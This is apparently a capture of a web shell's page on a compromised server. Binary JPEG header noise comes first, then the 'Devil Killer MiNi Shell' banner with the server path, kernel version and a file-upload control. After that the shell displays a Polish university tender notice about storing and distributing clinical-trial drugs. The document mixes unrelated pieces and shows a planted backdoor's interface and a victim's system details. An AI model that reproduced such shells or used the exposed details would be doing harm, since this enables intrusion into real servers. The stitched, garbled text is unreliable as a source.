JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220623/0022164301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Magazynowanie oraz dystrybucja do ośrodków produktów leczniczych stosowanych w badaniu klinicznym INFERRCT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Medyczny im. Piastów Śląskich we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288981</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wybrzeże Ludwika Pasteura 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-367</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bozena.cedzynska@umw.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umw.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Magazynowanie oraz dystrybucja do ośrodków produktów leczniczych stosowanych w badaniu klinicznym INFERRCT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3fc14ad5-f2e4-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00221643</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00060436/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.36 Usługa magazynowania oraz dystrybucji do ośrodków produktów leczniczych stosowanych w badaniu klinicznym INFERRCT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umed-wroc.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umed-wroc.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z<br/>uwzględnieniem wyjątków określonych w Pzp, oraz określonych w Rozdziale X ppkt. 5.2) i w Rozdziale<br/>XII niniejszej SWZ, odbywa się przy użyciu środków komunikacji elektronicznej, tj. Platformy. Do<br/>połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy<br/>protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez Internet. W<br/>celu złożenia, wycofania oferty oraz w celu porozumiewania się z Zamawiającym po otwarciu ofert,<br/>Wykonawca musi posiadać konto na Platformie, to znaczy być zarejestrowanym użytkownikiem<br/>Platformy. Aby zwrócić się do Zamawiającego o wyjaśnienie treści SWZ, Wykonawca nie musi<br/>posiadać konta na Platformie.<br/>2.Prawidłowym złożeniem ofert oraz dokumentów lub oświadczeń przez Wykonawcę za pomocą<br/>środka komunikacji elektronicznej jest ich złożenie pod adresem: https://umed wroc.logintrade.net/rejestracja/ustawowe.html w<br/>wierszu oznaczonym tytułem oraz znakiem sprawy<br/>niniejszego postępowania.<br/>3.Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>4.Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas,<br/>w którym zostanie potwierdzone złożenie oferty, dokumentu przez Wykonawcę.<br/>W wypadku Wykonawcy zalogowanego na Platformie, czas przekazania danych jest to czas wysłania<br/>dokumentu, oferty przez Platformę. W wypadku wybrania opcji złożenia oferty bez logowania,<br/>potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości mailowej, która jest<br/>wysyłana automatycznie do Wykonawcy po złożeniu oferty, dokumentu. Wiadomość otrzymuje<br/>Wykonawca na adres e-mail wskazany w formularzu po kliknięciu w ikonę „Złóż ofertę”.<br/>5.We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem postępowania nadanym przez Zamawiającego (AZP-260-TP-49/22).<br/>6.W zakresie ofert, oświadczeń, o których mowa w art. 125 ust.1 Pzp, podmiotowych środków<br/>dowodowych, przedmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów – sposób ich<br/>sporządzania i sposób przekazywania, wymagania techniczne dla<br/>zawierających je dokumentów elektronicznych oraz wymagania techniczne i organizacyjne użycia<br/>środków komunikacji elektronicznej służących do odbioru ww. dokumentów elektronicznych określa<br/>rozporządzenie Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020 r., poz. 2452).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13Rozporządzenia Parlamentu Europejskiego<br/>i Rady 2016/679 z dnia27 kwietnia 2016 r. Zamawiający informuje, że:1)Administratorem danych<br/>osobowych Wykonawców i innych osób uczestniczących w postępowaniu jest Uniwersytet Medyczny<br/>im. Piastów Śląskich we Wrocławiu z siedzibą przy Wybrzeżu Pasteura 1, 50-367 Wrocław, zwany<br/>dalej „Administratorem”, reprezentowany przez Rektora2)Administrator wyznaczył Inspektora Ochrony<br/>Danych, z którym można kontaktować się w sprawach dotyczących przetwarzania danych osobowych<br/>pod adresem e-mail: iod@umed.wroc.pl3)Dane osobowe niezbędne do wzięcia udziału w<br/>postępowaniu o udzielenie zamówienia publicznego przetwarzane będą na potrzeby przeprowadzenia tego postepowania, na<br/>podstawie art.6ust.1lit.cRODO,tj. niezbędność przetwarzania do wypełniania<br/>obowiązków prawnych ciążących na Administratorze zgodnie zPzp 4)Ze względu na jawność<br/>postępowania o udzielenie zamówienia publicznego, w oparciu o art. 18Pzp odbiorcami danych osobowych mogą być wszystkie<br/>zainteresowane osoby lub podmioty. Ograniczenie dostępu do danych<br/>może wystąpić jedynie w wyjątkowych przypadkach, określonych w ustawie, w szczególności jeśli jest<br/>to uzasadnione ochroną prywatności, interesem publicznym lub informacja stanowi tajemnicę przedsiębiorstwa 5)Administrator może udostępniać dane osobowe także podmiotom uprawnionym do<br/>ich otrzymania na podstawie odrębnych przepisów prawa lub umowy zawartej z administratorem, w<br/>szczególności podmiotom świadczącym usługi pocztowe/kurierskie lub dostawcom usług IT 6)Dane<br/>osobowe Wykonawców i innych uczestników postępowania będą przechowywane, zgodnie z art. 78<br/>ust. 1Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>obowiązywania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania<br/>umowy 7)Obowiązek podania przez Wykonawców danych osobowych bezpośrednio ich dotyczących<br/>oraz innych wymaganych danych jest wymogiem ustawowym określonym w przepisachPzp,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje<br/>niepodania określonych danych wynikają zPzp 8)Podane dane osobowe nie podlegają<br/>zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu, o którym mowa w art. 4 pkt 4) RODO,<br/>co oznacza formę zautomatyzowanego przetwarzania danych osobowych, które polega na<br/>wykorzystaniu danych osobowych do oceny niektórych czynników osobowych osoby fizycznej 9)Osoby<br/>uczestniczące w przedmiotowym postępowaniu posiadają:a)na podstawie art. 15 RODO prawo<br/>dostępu do danych osobowych bezpośrednio ich dotyczących. Zamawiający może żądać od osoby<br/>występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia;b)na podstawie art. 16 RODO prawo<br/>do sprostowania lub uzupełnienia danych osobowych (skorzystanie z prawa do sprostowania lub<br/>uzupełnienia danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym zPzp, a także nie może naruszać<br/>integralności protokołu postępowania oraz jego załączników);c)na podstawie art. 18 ust. 1RODO prawo<br/>żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania danych, zapewnienia korzystania ze środków ochrony<br/>prawnej lub przetwarzania w celu ochrony praw innej osoby fizycznej lub prawnej, a także z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej albo państwa członkowskiego). Wystąpienie z żądaniem, o którym mowa w<br/>art. 18 ust. 1RODO nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia postępowania o udzielenie zamówienia publicznego;d)prawo do wniesienia skargi<br/>do Prezesa Urzędu Ochrony Danych Osobowych, w przypadku uznania, że przetwarzanie danych<br/>osobowych dotyczących uczestników postępowania narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.Wykonawcy i innym osobom uczestniczącym w<br/>przedmiotowym postępowaniu nie przysługuje:<br/>a)prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b i e RODO;<br/>b)prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)prawo sprzeciwu wobec przetwarzania, o którym mowa w art. 21 RODO, ponieważ podstawą prawną<br/>przetwarzania danych osobowych Wykonawców i innych osób uczestniczących w postępowaniu jest<br/>art. 6 ust. 1 lit. c RODO.<br/>2.W przypadku danych osobowych przekazanych Zamawiającemu, a nie dotyczących bezpośrednio<br/>Wykonawcy (np. danych osobowych pracowników, podwykonawców, osób, którymi Wykonawca<br/>posługuje się przy realizacji zamówienia), Wykonawca zobowiązany jest do dopełnienia obowiązków<br/>informacyjnych, o których mowa w art. 13 i 14 RODO, w tym do przekazania odpowiedniej informacji o<br/>administrowaniu tymi danymi przez Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZP-260-TP-59/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest magazynowanie oraz dystrybucja do ośrodków produktów leczniczych stosowanych w<br/>badaniu klinicznym INFERRCT.<br/>Zamówienie realizowane w ramach projektu finansowanego przez Agencję Badań Medycznych pn. „Wpływ dożylnego<br/>leczenia karboksymaltozą żelazową na śmiertelność i chorobowość z przyczyn sercowo-naczyniowych, oraz na jakość życia<br/>pacjentów z zawałem serca i towarzyszącym niedoborem żelaza”, nr umowy 2019/ABM/01/00081.<br/>2. Przedmiot zamówienia został szczegółowo opisany w Opisie przedmiotu zamówienia (załącznik nr 3 do SWZ).<br/>Zamawiający wymaga, by usługi spełniały wymogi zawarte w Opisie przedmiotu zamówienia.<br/>3. Wykonawca winien podać w Formularzu ofertowym (załącznik nr 1 do SWZ) łączną cenę realizacji przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63122000-0 - Usługi magazynowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64120000-3 - Usługi kurierskie</p> <p class="mb-0">85149000-5 - Usługi farmaceutyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający zastosuje następujące kryteria oceny ofert:<br/>1) Cenę brutto przedmiotu zamówienia – 60 %,<br/>2) Termin realizacji dostawy produktów do ośrodka – 40%.<br/>2. Do porównania ofert będą brane pod uwagę: cena brutto przedmiotu zamówienia oraz termin realizacji dostawy produktów do<br/>ośrodka, podane w Formularzu ofertowym (załącznik nr 1 do SWZ).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji dostawy produktów do ośrodka</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający określa warunki udziału w postepowaniu w zakresie:<br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Wykonawca spełni warunek, jeżeli wykaże że posiada aktualne zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej lub zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie lub import badanego produktu leczniczego, pozwalających na przechowywanie i dystrybucję kategorii produktów objętych przetargiem oraz inne zezwolenia wymagane obowiązującymi przepisami do przeprowadzenia wszystkich czynności wyszczególnionych w opisie przedmiotu zamówienia.<br/>2)	zdolności technicznej lub zawodowej; <br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>- wykonał, a w wypadku świadczeń powtarzających się lub ciągłych również wykonuje, w okresie ostatnich 3 (trzech) lat (licząc wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 3 (trzy) kompleksowe usługi polegające na magazynowaniu oraz dystrybucji produktów leczniczych, których wartość wyniosła co najmniej 100 000,00 zł* (słownie: sto tysięcy złotych) brutto każda. <br/>* Dla wartości wskazanych przez Wykonawcę w walucie innej niż PLN, Zamawiający przyjmie przelicznik według średniego kursu NBP z dnia wszczęcia niniejszego postępowania, a jeżeli średni kurs nie będzie w tym dniu publikowany, to Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych tj.:<br/>1) Aktualnego zezwolenia Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej lub Zezwolenia Głównego Inspektora Farmaceutycznego na wytwarzanie lub import badanego produktu leczniczego, pozwalających na przechowywanie i dystrybucję kategorii produktów objętych przetargiem oraz inne zezwolenia wymagane obowiązującymi przepisami do przeprowadzenia wszystkich czynności wyszczególnionych w opisie przedmiotu zamówienia<br/>2) Wykazu usług wykonanych, a w wypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi<br/>zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wzór wykazu będzie stanowić<br/>załącznik do wezwania; Okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnego na dzień złożenia podmiotowego środka dowodowego, tj. Oświadczenia Wykonawcy o aktualności informacji<br/>zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1<br/>Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku, o którym mowa w pkt. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt. 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) 